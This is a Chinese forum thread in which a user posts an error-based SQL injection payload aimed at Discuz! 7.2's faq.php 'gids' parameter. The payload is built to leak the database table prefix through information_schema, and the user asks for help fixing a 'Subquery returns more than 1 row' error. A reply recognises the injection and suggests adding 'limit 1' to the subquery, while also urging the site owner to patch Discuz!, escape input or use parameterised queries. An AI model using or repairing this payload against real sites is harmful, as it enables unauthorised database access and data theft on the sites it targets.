sql高手看看 DZ7.2爆前缀出错,Subquery returns more than 1 row
代码作何修改才能解决这个问题呢?
/faq.php?action=grouppermission&gids='&gids=) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(hex(table_name)) FROM information_schema.tables where table_schema=database()limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a)# 兄弟,你这个注入…… 90_ 发表于 2015-5-31 12:45
兄弟,你这个注入……
老大,您没说清楚我不明白,能解决吗 知道的能说下么么么大?默认前缀改了 90_ 发表于 2015-5-31 12:45
兄弟,你这个注入……
90牛,您能告诉我怎么回事嘛?我是真的找不到人问了,大恩大德,永记在心 赞一个!!!!!
Re: sql高手看看 DZ7.2爆前缀出错,Subquery returns more than 1 row
从你贴出的代码来看,这是一段典型的用于获取表前缀的 SQL 注入 payload,错误提示 “Subquery returns more than 1 row” 是因为查询返回了多行结果,而子查询期望单行。如果你是在安全测试中需要调整语句,可以考虑在子查询里加上 `limit 1` 来限制结果行数。但更重要的是,这个漏洞表明你的程序存在 SQL 注入风险,建议立即修复:升级 Discuz! 版本、对输入做转义或使用参数化查询。如果是你自己的站点,请优先做安全加固,而不是修改攻击语句。
页:
[1]